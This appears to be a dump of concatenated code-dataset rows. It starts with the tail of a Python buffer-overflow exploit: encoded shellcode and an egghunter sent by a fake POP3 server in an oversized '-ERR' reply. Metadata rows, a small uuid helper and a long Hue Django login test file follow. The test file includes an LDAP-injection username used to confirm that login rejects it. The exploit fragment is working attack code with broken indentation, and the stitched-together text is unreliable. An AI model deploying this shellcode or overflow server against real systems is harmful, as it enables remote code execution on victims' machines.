shellcode += "\x33\x31\x4e\x33\x4c\x4b\x33\x34\x4c\x4b\x35\x51\x38"
shellcode += "\x50\x4d\x59\x50\x44\x56\x44\x47\x54\x31\x4b\x51\x4b"
shellcode += "\x45\x31\x46\x39\x30\x5a\x56\x31\x4b\x4f\x4d\x30\x51"
shellcode += "\x4f\x51\x4f\x50\x5a\x4c\x4b\x45\x42\x5a\x4b\x4c\x4d"
shellcode += "\x51\x4d\x42\x4a\x33\x31\x4c\x4d\x4c\x45\x58\x32\x45"
shellcode += "\x50\x45\x50\x43\x30\x36\x30\x55\x38\x30\x31\x4c\x4b"
shellcode += "\x42\x4f\x4d\x57\x4b\x4f\x48\x55\x4f\x4b\x4a\x50\x38"
shellcode += "\x35\x49\x32\x36\x36\x53\x58\x4f\x56\x4c\x55\x4f\x4d"
shellcode += "\x4d\x4d\x4b\x4f\x48\x55\x37\x4c\x35\x56\x43\x4c\x44"
shellcode += "\x4a\x4b\x30\x4b\x4b\x4d\x30\x33\x45\x33\x35\x4f\x4b"
shellcode += "\x30\x47\x45\x43\x33\x42\x52\x4f\x52\x4a\x35\x50\x51"
shellcode += "\x43\x4b\x4f\x39\x45\x45\x33\x43\x51\x32\x4c\x33\x53"
shellcode += "\x56\x4e\x32\x45\x32\x58\x43\x55\x53\x30\x41\x41"
buf = '-ERR ' + junk + eip + egghunter_nop_sled + egghunter + padding + tag + shellcode
buf += 'D' * (5000 - (len(buf) - 4))
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((ip,110))
s.listen(10)
print '[+] Waiting for connection...'
client_socket, client_address = s.accept()
print '[+] Accepted connection'
while True:
print '[+] Attempting to send payload'
client_socket.send(buf)
s.close()
print '[+] Connection closed'
| 41.658824 | 152 | 0.698955 | 674 | 3,541 | 3.658754 | 0.237389 | 0.041363 | 0.014599 | 0.014599 | 0.007299 | 0 | 0 | 0 | 0 | 0 | 0 | 0.274044 | 0.083875 | 3,541 | 84 | 153 | 42.154762 | 0.486128 | 0.101666 | 0 | 0 | 0 | 0.631579 | 0.662772 | 0.608778 | 0.017544 | 1 | 0 | 0 | 0 | 0 | null | null | 0 | 0.017544 | null | null | 0.070175 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | null | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
8a86bc880ea8f92620bb9008cda5e0cc2a7daa1d | 93 | py | Python | agentserver/utils/uuid.py | silverfernsys/agentserver | 3372f7a60af7a64ab3f4e431edeb95f23b2b6be5 | [
"BSD-4-Clause"
] | 2 | 2017-05-24T17:01:14.000Z | 2019-05-06T11:58:33.000Z | agentserver/utils/uuid.py | silverfernsys/agentserver | 3372f7a60af7a64ab3f4e431edeb95f23b2b6be5 | [
"BSD-4-Clause"
] | null | null | null | agentserver/utils/uuid.py | silverfernsys/agentserver | 3372f7a60af7a64ab3f4e431edeb95f23b2b6be5 | [
"BSD-4-Clause"
] | null | null | null | import binascii
import os
def uuid():
return binascii.hexlify(os.urandom(20)).decode()
| 13.285714 | 52 | 0.72043 | 13 | 93 | 5.153846 | 0.769231 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.025316 | 0.150538 | 93 | 6 | 53 | 15.5 | 0.822785 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | true | 0 | 0.5 | 0.25 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 1 | 1 | 0 | 0 | 7 |
8a88ecfea5b461e5f2d99fb23c47ebcffe5fe39c | 36,167 | py | Python | desktop/core/src/desktop/auth/views_test.py | yetsun/hue | 2e48f0cc70e233ee0e1b40733d4b2a18d8836c66 | [
"Apache-2.0"
] | 5,079 | 2015-01-01T03:39:46.000Z | 2022-03-31T07:38:22.000Z | desktop/core/src/desktop/auth/views_test.py | yetsun/hue | 2e48f0cc70e233ee0e1b40733d4b2a18d8836c66 | [
"Apache-2.0"
] | 1,623 | 2015-01-01T08:06:24.000Z | 2022-03-30T19:48:52.000Z | desktop/core/src/desktop/auth/views_test.py | yetsun/hue | 2e48f0cc70e233ee0e1b40733d4b2a18d8836c66 | [
"Apache-2.0"
] | 2,033 | 2015-01-04T07:18:02.000Z | 2022-03-28T19:55:47.000Z | #!/usr/bin/env python
# Licensed to Cloudera, Inc. under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. Cloudera, Inc. licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from builtins import object
import datetime
import sys
from django_auth_ldap import backend as django_auth_ldap_backend
from django.db.utils import DataError
from django.conf import settings
from django.test.client import Client
from nose.plugins.skip import SkipTest
from nose.tools import assert_true, assert_false, assert_equal, assert_raises
from hadoop.test_base import PseudoHdfsTestBase
from hadoop import pseudo_hdfs4
from useradmin import ldap_access
from useradmin.models import get_default_user_group, User, Group, get_profile
from useradmin.tests import LdapTestConnection
from useradmin.views import import_ldap_groups
from desktop import conf, middleware
from desktop.auth import backend
from desktop.auth.backend import create_user
from desktop.lib.django_test_util import make_logged_in_client
from desktop.lib.test_utils import add_to_group
if sys.version_info[0] > 2:
from unittest.mock import patch, Mock, MagicMock
else:
from mock import patch, Mock, MagicMock
def get_mocked_config():
return {
'mocked_ldap': {
'users': {},
'groups': {}
}
}
class TestLoginWithHadoop(PseudoHdfsTestBase):
integration = True
reset = []
test_username = 'test_login_with_hadoop'
@classmethod
def setup_class(cls):
# Simulate first login ever
User.objects.all().delete()
PseudoHdfsTestBase.setup_class()
cls.auth_backends = settings.AUTHENTICATION_BACKENDS
settings.AUTHENTICATION_BACKENDS = ('desktop.auth.backend.AllowFirstUserDjangoBackend',)
@classmethod
def teardown_class(cls):
settings.AUTHENTICATION_BACKENDS = cls.auth_backends
def setUp(self):
self.c = Client()
self.reset.append( conf.AUTH.BACKEND.set_for_testing(['desktop.auth.backend.AllowFirstUserDjangoBackend']) )
self.reset.append(conf.LDAP.SYNC_GROUPS_ON_LOGIN.set_for_testing(False))
def tearDown(self):
User.objects.all().delete()
for finish in self.reset:
finish()
if self.cluster.fs.do_as_user(self.test_username, self.cluster.fs.exists, "/user/%s" % self.test_username):
self.cluster.fs.do_as_superuser(self.cluster.fs.rmtree, "/user/%s" % self.test_username)
def test_login(self):
response = self.c.get('/hue/accounts/login/')
assert_equal(200, response.status_code, "Expected ok status.")
assert_true(response.context[0]['first_login_ever'])
response = self.c.post('/hue/accounts/login/', dict(username=self.test_username, password="foo"))
assert_equal(302, response.status_code, "Expected ok redirect status.")
assert_equal(response.url, "/")
assert_true(self.cluster.fs.do_as_user(self.test_username, self.fs.exists, "/user/%s" % self.test_username))
def test_login_old(self):
response = self.c.get('/accounts/login/')
assert_equal(200, response.status_code, "Expected ok status.")
assert_true(response.context[0]['first_login_ever'])
response = self.c.post('/accounts/login/', dict(username=self.test_username, password="foo"), follow=True)
assert_equal(200, response.status_code, "Expected ok status.")
assert_true(self.cluster.fs.do_as_user(self.test_username, self.fs.exists, "/user/%s" % self.test_username))
response = self.c.get('/accounts/login/')
assert_equal(302, response.status_code, "Expected ok redirect status.")
assert_equal(response.url, "/")
def test_login_home_creation_failure(self):
response = self.c.get('/hue/accounts/login/')
assert_equal(200, response.status_code, "Expected ok status.")
assert_true(response.context[0]['first_login_ever'])
# Create home directory as a file in order to fail in the home creation later
cluster = pseudo_hdfs4.shared_cluster()
fs = cluster.fs
assert_false(cluster.fs.exists("/user/%s" % self.test_username))
fs.do_as_superuser(fs.create, "/user/%s" % self.test_username)
response = self.c.post('/hue/accounts/login/', {
'username': self.test_username,
'password': "test-hue-foo2",
}, follow=True)
assert_equal(200, response.status_code, "Expected ok status.")
assert_true('/about' in response.content, response.content)
# Custom login process should not do 'http-equiv="refresh"' but call the correct view
# 'Could not create home directory.' won't show up because the messages are consumed before
def test_login_expiration(self):
response = self.c.post('/hue/accounts/login/', {
'username': self.test_username,
'password': "test-hue-foo2",
}, follow=True)
assert_equal(200, response.status_code, "Expected ok status.")
self.reset.append(conf.AUTH.EXPIRES_AFTER.set_for_testing(10000))
user = User.objects.get(username=self.test_username)
user.last_login = datetime.datetime.now() + datetime.timedelta(days=-365)
user.save()
# Deactivate user
old_settings = settings.ADMINS
settings.ADMINS = []
response = self.c.post('/hue/accounts/login/', {
'username': self.test_username,
'password': "test-hue-foo2",
}, follow=True)
assert_equal(200, response.status_code, "Expected ok status.")
assert_true("Account deactivated. Please contact an administrator." in response.content, response.content)
settings.ADMINS = old_settings
# Activate user
user = User.objects.get(username=self.test_username)
user.is_active = True
user.save()
response = self.c.post('/hue/accounts/login/', dict(username=self.test_username, password="foo"))
assert_equal(200, response.status_code, "Expected ok status.")
class TestLdapLogin(PseudoHdfsTestBase):
reset = []
test_username = 'test_ldap_login'
@classmethod
def setup_class(cls):
# Simulate first login ever
User.objects.all().delete()
PseudoHdfsTestBase.setup_class()
cls.ldap_backend = django_auth_ldap_backend.LDAPBackend
django_auth_ldap_backend.LDAPBackend = MockLdapBackend
# Override auth backend, settings are only loaded from conf at initialization so we can't use set_for_testing
cls.auth_backends = settings.AUTHENTICATION_BACKENDS
settings.AUTHENTICATION_BACKENDS = ('desktop.auth.backend.LdapBackend',)
# Need to recreate LdapBackend class with new monkey patched base class
reload(backend)
@classmethod
def teardown_class(cls):
django_auth_ldap_backend.LDAPBackend = cls.ldap_backend
settings.AUTHENTICATION_BACKENDS = cls.auth_backends
reload(backend)
def setUp(self):
self.c = Client()
self.reset.append( conf.AUTH.BACKEND.set_for_testing(['desktop.auth.backend.LdapBackend']) )
self.reset.append(conf.LDAP.LDAP_URL.set_for_testing('does not matter'))
self.reset.append(conf.LDAP.SYNC_GROUPS_ON_LOGIN.set_for_testing(False))
def tearDown(self):
User.objects.all().delete()
for finish in self.reset:
finish()
if self.cluster.fs.do_as_user(self.test_username, self.cluster.fs.exists, "/user/%s" % self.test_username):
self.cluster.fs.do_as_superuser(self.cluster.fs.rmtree, "/user/%s" % self.test_username)
if self.cluster.fs.do_as_user("curly", self.cluster.fs.exists, "/user/curly"):
self.cluster.fs.do_as_superuser(self.cluster.fs.rmtree, "/user/curly")
def test_login(self):
response = self.c.get('/hue/accounts/login/')
assert_equal(200, response.status_code, "Expected ok status.")
assert_false(response.context[0]['first_login_ever'])
response = self.c.post('/hue/accounts/login/', {
'username': self.test_username,
'password': "ldap1",
'server': "LDAP"
})
assert_equal(302, response.status_code, "Expected ok redirect status.")
assert_equal(response.url, "/")
assert_true(self.cluster.fs.do_as_user(self.test_username, self.fs.exists, "/user/%s" % self.test_username))
def test_login_failure_for_bad_username(self):
self.reset.append(conf.LDAP.LDAP_SERVERS.set_for_testing(get_mocked_config()))
response = self.c.get('/hue/accounts/login/')
assert_equal(200, response.status_code, "Expected ok status.")
response = self.c.post('/hue/accounts/login/', dict(username="test1*)(&(objectClass=*)", password="foo"))
assert_equal(200, response.status_code, "Expected ok status.")
assert_true('Invalid username or password' in response.content, response)
def test_login_does_not_reset_groups(self):
client = make_logged_in_client(username=self.test_username, password="test")
user = User.objects.get(username=self.test_username)
test_group, created = Group.objects.get_or_create(name=self.test_username)
default_group = get_default_user_group()
user.groups.all().delete()
assert_false(user.groups.exists())
# No groups
response = client.post('/hue/accounts/login/', dict(username=self.test_username, password="test"), follow=True)
assert_equal(200, response.status_code, "Expected ok status.")
assert_equal([default_group.name], [i for i in user.groups.values_list('name', flat=True)])
add_to_group(self.test_username, self.test_username)
# Two groups
client.get('/accounts/logout')
response = client.post('/hue/accounts/login/', dict(username=self.test_username, password="test"), follow=True)
assert_equal(200, response.status_code, "Expected ok status.")
assert_equal(set([default_group.name, test_group.name]), set(user.groups.values_list('name', flat=True)))
user.groups.filter(name=default_group.name).delete()
assert_equal(set([test_group.name]), set(user.groups.values_list('name', flat=True)))
# Keep manual group only, don't re-add default group
client.get('/accounts/logout')
response = client.post('/hue/accounts/login/', dict(username=self.test_username, password="test"), follow=True)
assert_equal(200, response.status_code, "Expected ok status.")
assert_equal([test_group.name], list(user.groups.values_list('name', flat=True)))
user.groups.remove(test_group)
assert_false(user.groups.exists())
# Re-add default group
client.get('/accounts/logout')
response = client.post('/hue/accounts/login/', dict(username=self.test_username, password="test"), follow=True)
assert_equal(200, response.status_code, "Expected ok status.")
assert_equal([default_group.name], list(user.groups.values_list('name', flat=True)))
def test_login_home_creation_failure(self):
response = self.c.get('/hue/accounts/login/')
assert_equal(200, response.status_code, "Expected ok status.")
assert_false(response.context[0]['first_login_ever'])
# Create home directory as a file in order to fail in the home creation later
cluster = pseudo_hdfs4.shared_cluster()
fs = cluster.fs
assert_false(self.cluster.fs.do_as_user(self.test_username, cluster.fs.exists, "/user/%s" % self.test_username))
fs.do_as_superuser(fs.create, "/user/%s" % self.test_username)
response = self.c.post('/hue/accounts/login/', {
'username': self.test_username,
'password': "test-hue-ldap2",
'server': "LDAP"
}, follow=True)
assert_equal(200, response.status_code, "Expected ok status.")
assert_true('/about' in response.content, response.content)
# Custom login process should not do 'http-equiv="refresh"' but call the correct view
# 'Could not create home directory.' won't show up because the messages are consumed before
def test_login_ignore_case(self):
self.reset.append(conf.LDAP.IGNORE_USERNAME_CASE.set_for_testing(True))
response = self.c.post('/hue/accounts/login/', {
'username': self.test_username.upper(),
'password': "ldap1",
'server': "LDAP"
})
assert_equal(302, response.status_code, "Expected ok redirect status.")
assert_equal(1, len(User.objects.all()))
assert_equal(self.test_username, User.objects.all()[0].username)
self.c.logout()
response = self.c.post('/hue/accounts/login/', {
'username': self.test_username,
'password': "ldap1",
'server': "LDAP"
})
assert_equal(302, response.status_code, "Expected ok redirect status.")
assert_equal(1, len(User.objects.all()))
assert_equal(self.test_username, User.objects.all()[0].username)
def test_login_force_lower_case(self):
self.reset.append(conf.LDAP.FORCE_USERNAME_LOWERCASE.set_for_testing(True))
response = self.c.post('/hue/accounts/login/', {
'username': self.test_username.upper(),
'password': "ldap1",
'server': "LDAP"
})
assert_equal(302, response.status_code, "Expected ok redirect status.")
assert_equal(1, len(User.objects.all()))
self.c.logout()
response = self.c.post('/hue/accounts/login/', {
'username': self.test_username,
'password': "ldap1",
'server': "LDAP"
})
assert_equal(302, response.status_code, "Expected ok redirect status.")
assert_equal(1, len(User.objects.all()))
assert_equal(self.test_username, User.objects.all()[0].username)
def test_login_force_lower_case_and_ignore_case(self):
self.reset.append(conf.LDAP.IGNORE_USERNAME_CASE.set_for_testing(True))
self.reset.append(conf.LDAP.FORCE_USERNAME_LOWERCASE.set_for_testing(True))
response = self.c.post('/hue/accounts/login/', {
'username': self.test_username.upper(),
'password': "ldap1",
'server': "LDAP"
})
assert_equal(302, response.status_code, "Expected ok redirect status.")
assert_equal(1, len(User.objects.all()))
assert_equal(self.test_username, User.objects.all()[0].username)
self.c.logout()
response = self.c.post('/hue/accounts/login/', {
'username': self.test_username,
'password': "ldap1",
'server': "LDAP"
})
assert_equal(302, response.status_code, "Expected ok redirect status.")
assert_equal(1, len(User.objects.all()))
assert_equal(self.test_username, User.objects.all()[0].username)
def test_import_groups_on_login(self):
self.reset.append(conf.LDAP.SYNC_GROUPS_ON_LOGIN.set_for_testing(True))
ldap_access.CACHED_LDAP_CONN = LdapTestConnection()
# Make sure LDAP groups exist or they won't sync
import_ldap_groups(ldap_access.CACHED_LDAP_CONN, 'TestUsers', import_members=False, import_members_recursive=False, sync_users=False, import_by_dn=False)
import_ldap_groups(ldap_access.CACHED_LDAP_CONN, 'Test Administrators', import_members=False, import_members_recursive=False, sync_users=False, import_by_dn=False)
response = self.c.post('/hue/accounts/login/', {
'username': "curly",
'password': "ldap1",
'server': "TestUsers"
})
assert_equal(302, response.status_code, response.status_code)
assert_equal(1, len(User.objects.all()))
# The two curly are a part of in LDAP and the default group.
assert_equal(3, User.objects.all()[0].groups.all().count(), User.objects.all()[0].groups.all())
class TestRemoteUserLogin(PseudoHdfsTestBase):
reset = []
test_username = "test_remote_user_login"
@classmethod
def setup_class(cls):
# Simulate first login ever
User.objects.all().delete()
PseudoHdfsTestBase.setup_class()
cls.auth_backends = settings.AUTHENTICATION_BACKENDS
settings.AUTHENTICATION_BACKENDS = ('desktop.auth.backend.RemoteUserDjangoBackend',)
cls.remote_user_middleware_header = middleware.HueRemoteUserMiddleware.header
middleware.HueRemoteUserMiddleware.header = conf.AUTH.REMOTE_USER_HEADER.get()
@classmethod
def teardown_class(cls):
middleware.HueRemoteUserMiddleware.header = cls.remote_user_middleware_header
settings.AUTHENTICATION_BACKENDS = cls.auth_backends
def setUp(self):
self.reset.append( conf.AUTH.BACKEND.set_for_testing(['desktop.auth.backend.RemoteUserDjangoBackend']) )
self.reset.append( conf.AUTH.REMOTE_USER_HEADER.set_for_testing('REMOTE_USER') ) # Set for middleware
self.c = Client()
def tearDown(self):
for finish in self.reset:
finish()
User.objects.all().delete()
if self.cluster.fs.do_as_user(self.test_username, self.fs.exists, "/user/%s" % self.test_username):
self.cluster.fs.do_as_superuser(self.cluster.fs.rmtree, "/user/%s" % self.test_username)
if self.cluster.fs.do_as_user(self.test_username, self.fs.exists, "/user/%s_%s" % (self.test_username, '2')):
self.cluster.fs.do_as_superuser(self.cluster.fs.rmtree, "/user/%s_%s" % (self.test_username, '2'))
def test_normal(self):
response = self.c.get('/hue/accounts/login/')
assert_equal(200, response.status_code, "Expected ok status.")
assert_false(response.context[0]['first_login_ever'])
assert_equal(0, len(User.objects.all()))
response = self.c.post('/hue/accounts/login/', {}, **{"REMOTE_USER": self.test_username})
assert_equal(200, response.status_code, "Expected ok status.")
assert_equal(1, len(User.objects.all()))
assert_equal(self.test_username, User.objects.all()[0].username)
def test_ignore_case(self):
self.reset.append( conf.AUTH.IGNORE_USERNAME_CASE.set_for_testing(True) )
response = self.c.get('/hue/accounts/login/')
assert_equal(200, response.status_code, "Expected ok status.")
assert_false(response.context[0]['first_login_ever'])
response = self.c.post('/hue/accounts/login/', {}, **{"REMOTE_USER": self.test_username})
assert_equal(200, response.status_code, "Expected ok status.")
assert_equal(1, len(User.objects.all()))
assert_equal(self.test_username, User.objects.all()[0].username)
response = self.c.post('/hue/accounts/login/', {}, **{"REMOTE_USER": self.test_username.upper()})
assert_equal(200, response.status_code, "Expected ok status.")
assert_equal(1, len(User.objects.all()))
assert_equal(self.test_username, User.objects.all()[0].username)
response = self.c.post('/hue/accounts/login/', {}, **{"REMOTE_USER": "%s_%s" % (self.test_username.upper(), '2')})
assert_equal(200, response.status_code, "Expected ok status.")
assert_equal(2, len(User.objects.all().order_by('username')))
assert_equal("%s_%s" % (self.test_username, '2'), User.objects.all().order_by('username')[1].username)
response = self.c.post('/hue/accounts/login/', {}, **{"REMOTE_USER": "%s_%s" % (self.test_username, '2')})
assert_equal(200, response.status_code, "Expected ok status.")
assert_equal(2, len(User.objects.all()))
assert_equal("%s_%s" % (self.test_username, '2'), User.objects.all().order_by('username')[1].username)
def test_force_lower_case(self):
self.reset.append( conf.AUTH.FORCE_USERNAME_LOWERCASE.set_for_testing(True) )
response = self.c.get('/hue/accounts/login/')
assert_equal(200, response.status_code, "Expected ok status.")
assert_false(response.context[0]['first_login_ever'])
response = self.c.post('/hue/accounts/login/', {}, **{"REMOTE_USER": self.test_username})
assert_equal(200, response.status_code, "Expected ok status.")
assert_equal(1, len(User.objects.all()))
assert_equal(self.test_username, User.objects.all()[0].username)
response = self.c.post('/hue/accounts/login/', {}, **{"REMOTE_USER": self.test_username.upper()})
assert_equal(200, response.status_code, "Expected ok status.")
assert_equal(1, len(User.objects.all()))
assert_equal(self.test_username, User.objects.all()[0].username)
def test_ignore_case_and_force_lower_case(self):
reset = conf.AUTH.FORCE_USERNAME_LOWERCASE.set_for_testing(False)
try:
response = self.c.post('/hue/accounts/login/', {}, **{"REMOTE_USER": self.test_username.upper()})
assert_equal(200, response.status_code, "Expected ok status.")
assert_equal(1, len(User.objects.all()))
assert_equal(self.test_username.upper(), User.objects.all()[0].username)
finally:
reset()
self.reset.append( conf.AUTH.FORCE_USERNAME_LOWERCASE.set_for_testing(True) )
self.reset.append( conf.AUTH.IGNORE_USERNAME_CASE.set_for_testing(True) )
# Previously existing users should not be forced to lower case.
response = self.c.post('/hue/accounts/login/', {}, **{"REMOTE_USER": self.test_username.upper()})
assert_equal(200, response.status_code, "Expected ok status.")
assert_equal(1, len(User.objects.all()))
assert_equal(self.test_username.upper(), User.objects.all()[0].username)
# New users should be forced to lowercase.
response = self.c.post('/hue/accounts/login/', {}, **{"REMOTE_USER": "%s_%s" % (self.test_username.upper(), '2')})
assert_equal(200, response.status_code, "Expected ok status.")
assert_equal(2, len(User.objects.all()))
assert_equal("%s_%s" % (self.test_username, '2'), User.objects.all().order_by('username')[1].username)
class TestMultipleBackendLogin(PseudoHdfsTestBase):
integration = True
reset = []
test_username = "test_multiple_login"
@classmethod
def setup_class(cls):
# Simulate first login ever
User.objects.all().delete()
PseudoHdfsTestBase.setup_class()
cls.ldap_backend = django_auth_ldap_backend.LDAPBackend
django_auth_ldap_backend.LDAPBackend = MockLdapBackend
# Override auth backend, settings are only loaded from conf at initialization so we can't use set_for_testing
cls.auth_backends = settings.AUTHENTICATION_BACKENDS
settings.AUTHENTICATION_BACKENDS = ('desktop.auth.backend.LdapBackend','desktop.auth.backend.AllowFirstUserDjangoBackend')
# Need to recreate LdapBackend class with new monkey patched base class
reload(backend)
@classmethod
def teardown_class(cls):
django_auth_ldap_backend.LDAPBackend = cls.ldap_backend
settings.AUTHENTICATION_BACKENDS = cls.auth_backends
reload(backend)
def setUp(self):
self.c = Client()
self.reset.append( conf.AUTH.BACKEND.set_for_testing(['desktop.auth.backend.LdapBackend','desktop.auth.backend.AllowFirstUserDjangoBackend']))
self.reset.append(conf.LDAP.LDAP_URL.set_for_testing('does not matter'))
def tearDown(self):
User.objects.all().delete()
for finish in self.reset:
finish()
if self.cluster.fs.do_as_user(self.test_username, self.fs.exists, "/user/%s" % self.test_username):
self.cluster.fs.do_as_superuser(self.cluster.fs.rmtree, "/user/%s" % self.test_username)
def test_login_with_ldap(self):
ldap_access.CACHED_LDAP_CONN = LdapTestConnection()
response = self.c.post('/hue/accounts/login/', {
'username': "curly",
'password': "ldap1",
'server': "LDAP"
})
assert_equal(302, response.status_code, response.status_code)
assert_equal(1, len(User.objects.all()))
def test_fallback_to_db(self):
ldap_access.CACHED_LDAP_CONN = LdapTestConnection()
client = make_logged_in_client(username=self.test_username, password="test")
client.get('/accounts/logout')
user = User.objects.get(username=self.test_username)
response = self.c.post('/hue/accounts/login/', dict(username=self.test_username, password="foo", server="LDAP"))
assert_equal(302, response.status_code, "Expected ok redirect status.")
assert_true(self.cluster.fs.do_as_user(self.test_username, self.fs.exists, "/user/%s" % self.test_username))
class TestMultipleBackendLoginNoHadoop(object):
integration = True
reset = []
test_username = "test_mlogin_no_hadoop"
@classmethod
def setup_class(cls):
# Simulate first login ever
User.objects.all().delete()
cls.ldap_backend = django_auth_ldap_backend.LDAPBackend
django_auth_ldap_backend.LDAPBackend = MockLdapBackend
# Override auth backend, settings are only loaded from conf at initialization so we can't use set_for_testing
cls.auth_backends = settings.AUTHENTICATION_BACKENDS
settings.AUTHENTICATION_BACKENDS = (['desktop.auth.backend.LdapBackend', 'desktop.auth.backend.AllowFirstUserDjangoBackend'])
# Need to recreate LdapBackend class with new monkey patched base class
reload(backend)
@classmethod
def teardown_class(cls):
django_auth_ldap_backend.LDAPBackend = cls.ldap_backend
settings.AUTHENTICATION_BACKENDS = cls.auth_backends
reload(backend)
def setUp(self):
self.c = Client()
self.reset.append( conf.AUTH.BACKEND.set_for_testing(['AllowFirstUserDjangoBackend', 'LdapBackend']) )
self.reset.append(conf.LDAP.LDAP_URL.set_for_testing('does not matter'))
def tearDown(self):
User.objects.all().delete()
for finish in self.reset:
finish()
def test_login(self):
ldap_access.CACHED_LDAP_CONN = LdapTestConnection()
response = self.c.get('/hue/accounts/login/')
assert_equal(200, response.status_code, "Expected ok status.")
assert_true(response.context[0]['first_login_ever'])
response = self.c.post('/hue/accounts/login/', {
'username': self.test_username,
'password': "ldap1",
'password1': "ldap1",
'password2': "ldap1",
'server': "Local"
})
assert_equal(302, response.status_code, "Expected ok redirect status.")
assert_equal(response.url, "/")
self.c.get('/accounts/logout')
response = self.c.post('/hue/accounts/login/', {
'username': self.test_username,
'password': "ldap1",
'server': "LDAP"
})
assert_equal(302, response.status_code, "Expected ok redirect status.")
assert_equal(response.url, "/")
class TestLogin(PseudoHdfsTestBase):
reset = []
test_username = "test_login"
@classmethod
def setup_class(cls):
# Simulate first login ever
User.objects.all().delete()
PseudoHdfsTestBase.setup_class()
cls.auth_backends = settings.AUTHENTICATION_BACKENDS
settings.AUTHENTICATION_BACKENDS = ('desktop.auth.backend.AllowFirstUserDjangoBackend',)
@classmethod
def teardown_class(cls):
settings.AUTHENTICATION_BACKENDS = cls.auth_backends
def setUp(self):
self.c = Client()
self.reset.append( conf.AUTH.BACKEND.set_for_testing(['desktop.auth.backend.AllowFirstUserDjangoBackend']) )
def tearDown(self):
for finish in self.reset:
finish()
User.objects.all().delete()
if self.cluster.fs.do_as_user(self.test_username, self.fs.exists, "/user/%s" % self.test_username):
self.cluster.fs.do_as_superuser(self.cluster.fs.rmtree, "/user/%s" % self.test_username)
def test_bad_first_user(self):
self.reset.append( conf.AUTH.BACKEND.set_for_testing(["desktop.auth.backend.AllowFirstUserDjangoBackend"]) )
response = self.c.get('/hue/accounts/login/')
assert_equal(200, response.status_code, "Expected ok status.")
assert_true(response.context[0]['first_login_ever'])
response = self.c.post('/hue/accounts/login/', dict(username="foo 1", password="foo"))
assert_equal(200, response.status_code, "Expected ok status.")
#assert_true('This value may contain only letters, numbers and @/./+/-/_ characters.' in response.content, response)
assert_true('This value may contain only ' in response.content, response)
def test_non_jframe_login(self):
client = make_logged_in_client(username=self.test_username, password="test")
# Logout first
client.get('/accounts/logout')
# Login
response = client.post('/hue/accounts/login/', dict(username=self.test_username, password="test"), follow=True)
template = 'hue.mako'
assert_true(any([template in _template.filename for _template in response.templates]), response.content) # Go to superuser wizard
def test_login_expiration(self):
""" Expiration test without superusers """
old_settings = settings.ADMINS
self.reset.append( conf.AUTH.BACKEND.set_for_testing(["desktop.auth.backend.AllowFirstUserDjangoBackend"]) )
self.reset.append( conf.AUTH.EXPIRES_AFTER.set_for_testing(0) )
self.reset.append( conf.AUTH.EXPIRE_SUPERUSERS.set_for_testing(False) )
client = make_logged_in_client(username=self.test_username, password="test")
client.get('/accounts/logout')
user = User.objects.get(username=self.test_username)
# Login successfully
try:
user.is_superuser = True
user.save()
response = client.post('/hue/accounts/login/', dict(username=self.test_username, password="test"), follow=True)
assert_equal(200, response.status_code, "Expected ok status.")
client.get('/accounts/logout')
# Login fail
settings.ADMINS = [(self.test_username, 'test@test.com')]
user.is_superuser = False
user.save()
response = client.post('/hue/accounts/login/', dict(username=self.test_username, password="test"), follow=True)
assert_equal(200, response.status_code, "Expected ok status.")
assert_true('Account deactivated. Please contact an <a href="mailto:test@test.com">administrator</a>' in response.content, response.content)
# Failure should report an inactive user without admin link
settings.ADMINS = []
response = client.post('/hue/accounts/login/', dict(username=self.test_username, password="test"), follow=True)
assert_equal(200, response.status_code, "Expected ok status.")
assert_true("Account deactivated. Please contact an administrator." in response.content, response.content)
finally:
settings.ADMINS = old_settings
def test_login_expiration_with_superusers(self):
""" Expiration test with superusers """
self.reset.append( conf.AUTH.BACKEND.set_for_testing(["desktop.auth.backend.AllowFirstUserDjangoBackend"]) )
self.reset.append( conf.AUTH.EXPIRES_AFTER.set_for_testing(0) )
self.reset.append( conf.AUTH.EXPIRE_SUPERUSERS.set_for_testing(True) )
client = make_logged_in_client(username=self.test_username, password="test")
client.get('/accounts/logout')
user = User.objects.get(username=self.test_username)
# Login fail
user.is_superuser = True
user.save()
response = client.post('/hue/accounts/login/', dict(username=self.test_username, password="test"), follow=True)
assert_equal(200, response.status_code, "Expected unauthorized status.")
def test_modal_login(self):
c = make_logged_in_client(username='test', password='test', is_superuser=False, recreate=True)
response = c.get('/hue')
assert_true(b'<div id="login-modal" class="modal fade hide">' in response.content, response.content)
def test_login_without_last_login(self):
self.reset.append( conf.AUTH.BACKEND.set_for_testing(["desktop.auth.backend.AllowFirstUserDjangoBackend"]) )
self.reset.append( conf.AUTH.EXPIRES_AFTER.set_for_testing(10) )
client = make_logged_in_client(username=self.test_username, password="test")
client.get('/accounts/logout')
user = User.objects.get(username=self.test_username)
user.last_login = None
user.save()
response = client.post('/hue/accounts/login/', dict(username=self.test_username, password="test"), follow=True)
assert_equal(200, response.status_code, "Expected ok status.")
class TestLogin(object):
reset = []
test_username = "test_login"
@classmethod
def setup_class(cls):
User.objects.all().delete() # Simulate first login ever
cls.auth_backends = settings.AUTHENTICATION_BACKENDS
settings.AUTHENTICATION_BACKENDS = ('desktop.auth.backend.AllowFirstUserDjangoBackend',)
@classmethod
def teardown_class(cls):
settings.AUTHENTICATION_BACKENDS = cls.auth_backends
